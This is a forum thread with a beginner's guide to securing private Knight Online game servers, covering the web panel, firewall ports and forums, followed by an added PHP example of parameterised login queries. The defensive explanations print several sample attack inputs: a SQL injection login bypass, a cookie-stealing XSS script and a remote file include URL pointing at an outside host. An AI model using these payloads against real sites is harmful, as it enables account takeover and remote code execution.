Got hacked? Afraid of getting hacked?

Newbie Spellweaver
Joined
Jun 29, 2007
Messages
22
Reaction score
0
Hi all,
I decided to write my first guide because recently I got too many PMs about the security of KO servers.
I will tell you how to make your server as secure as it should be.


  • KOPANEL
  • PORTS
  • FORUM

KOPANEL:

Well, a kopanel that u downloaded from ragezone or got from someone else is just not SECURE because its source is known by other ppl, so if they find a vulnerability they can hack u anytime...
I suggest you write your own kopanel BUT:
make sure you don't allow any kind of XSS, SQL injection, file uploading or RFI security hole in it.
If you don't know anything about PHP then kopanel is ok for u, but it still has some security problems.
Before you add something to your kopanel, look at the code; it may contain dangerous code.
How to secure your panel from sql injection?
Test() all $_POST and $_GET data in the source.
What about XSS attacks?
Disable the javascript on some parts of your kopanel.

Example of SQL injection:
in login.php

$msquery="SELECT COUNT(strACcountID) FROM tb_user WHERE strACcountID = '$login' AND strPasswd = '$pass'";

so if I write in login gerydeft' or '1'='1 and in password pass' or '1'='1 our query will look like this:

$msquery="SELECT COUNT(strACcountID) FROM tb_user WHERE strACcountID = 'gerydeft' or '1'='1' AND strPasswd = 'pass' or '1'='1'";

Because 1 is always equal to 1, it will log me in on gerydeft's acc.

(This is just a typical SQL injection; there are a lot of ways to execute this hack.)

U could say I can't insert this long string because
<td>User:</td>
<td><input type="text" class="input" name="user" value="" maxlength="12" size="12"></td>

That's false. This is client side code, so I can edit it as I want.
So what is the way to fix it?

If u have heteric's anti_sqlinjection.php
then include it and test() all get and post data.

What does an XSS attack (cross-site scripting) look like?

In plenty of places on the web, input fields are vulnerable to this hack.
For example I would write <script>alert(document.cookie)</script>

This script is in the source, and if ragezone weren't secured now I could steal your accounts.
How? I would send your cookies to my server and inject them.
An XSS attack can only execute client side script, not server side.

What about server side PHP scripts?
There is a hack called RFI (Remote File Include).
Say a PHP file like:
vuln.php:
PHP:
<?php
include($_GET["act"]);
?>
so I execute: vuln.php?act=http://mysite.com/phpcode.txt

and all PHP code in my txt would run.

One more suggestion: always use the most recent PHP version and don't leave server.ini in your www folder
(or anybody can read it).

PORTS:
Well, if u have a router, basically most ports are closed, but if u don't have one I suggest u install a firewall
and close some of these ports:
21 ftp (only if ur server doesn't use this)
23 telnet
1433 mssql
3306 mysql

Be careful: don't close game ports or 80, or your website will be down.

Also don't allow remote on ur server; rather use VNC or TeamViewer, and if u can, only allow connections from u.

Change your MSSQL password once a week and never test something on your own server; rather test it on your PC.

If u got DDoSed, closing ports is also a way to fix it.

Make backups often, once or twice a week.

FORUM:
Forums are also a vulnerable system of your server.
I suggest u use an external forum, and do not store passwords or anything important in ur PM box.

Disable xp_cmdshell command in your mssql database.
Also disable net.exe and net2.exe in system32 folder

GL with your server, sry for my grammar, I am not an English man ^^

Last edited by a moderator:
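
Added example, not part of the original post or of any kopanel code: the login.php query from the guide next to a version that binds the values as parameters and enforces the 12-character limit on the server. It assumes PDO with an in-memory SQLite database standing in for MSSQL; the function names, the allowed character set and the sample account row are made up for the demo.

```php
<?php
// Added example. SQLite in memory stands in for the MSSQL database (assumption);
// the account row is constructed sample data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE tb_user (strAccountID TEXT PRIMARY KEY, strPasswd TEXT)");
$db->exec("INSERT INTO tb_user VALUES ('gerydeft', 'correct-pass')");

// Pattern from login.php in the guide: input is pasted into the SQL text.
function login_concat(PDO $db, string $login, string $pass): bool {
    $q = "SELECT COUNT(strAccountID) FROM tb_user "
       . "WHERE strAccountID = '$login' AND strPasswd = '$pass'";
    return (int) $db->query($q)->fetchColumn() > 0;
}

// Server-side check of the account name. maxlength="12" in the HTML form is
// only a browser hint, so the limit has to be enforced again here.
// The allowed character set is an assumption for this demo.
function valid_account_id(string $login): bool {
    return preg_match('/\A[A-Za-z0-9_]{1,12}\z/', $login) === 1;
}

// Bound parameters: the values travel separately from the SQL text, so quotes
// in the input are compared as data and cannot change the WHERE clause.
function login_bound(PDO $db, string $login, string $pass): bool {
    $st = $db->prepare("SELECT COUNT(strAccountID) FROM tb_user "
                     . "WHERE strAccountID = ? AND strPasswd = ?");
    $st->execute([$login, $pass]);
    return (int) $st->fetchColumn() > 0;
}

// What the login page should call: validate first, then query with binding.
function login(PDO $db, string $login, string $pass): bool {
    return valid_account_id($login) && login_bound($db, $login, $pass);
}

// The inputs quoted in the guide, a wrong password, then a normal login.
$cases = [
    ["gerydeft' or '1'='1", "pass' or '1'='1"],
    ['gerydeft', 'wrong-pass'],
    ['gerydeft', 'correct-pass'],
];
foreach ($cases as [$u, $p]) {
    printf("%-22s concat=%s bound=%s validated=%s\n", $u,
        var_export(login_concat($db, $u, $p), true),
        var_export(login_bound($db, $u, $p), true),
        var_export(login($db, $u, $p), true));
}
```

Run it with the PHP command line (the pdo_sqlite extension is required) to compare the three functions on each input.
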
Experienced Elementalist
Joined
Dec 7, 2006
Messages
250
Reaction score
2
Re: [Guide] Got hacked? Afraid of getting hacked?

nice, what about ddos protection?
 
Newbie Spellweaver
Joined
Nov 17, 2008
Messages
19
Reaction score
0
Re: [Guide] Got hacked? Afraid of getting hacked?

Any way to protect the ebenezer from port attacks?
 
Newbie Spellweaver
Joined
Apr 18, 2008
Messages
24
Reaction score
0
Re: [Guide] Got hacked? Afraid of getting hacked?

Change the ebenezer port, simple as that?
 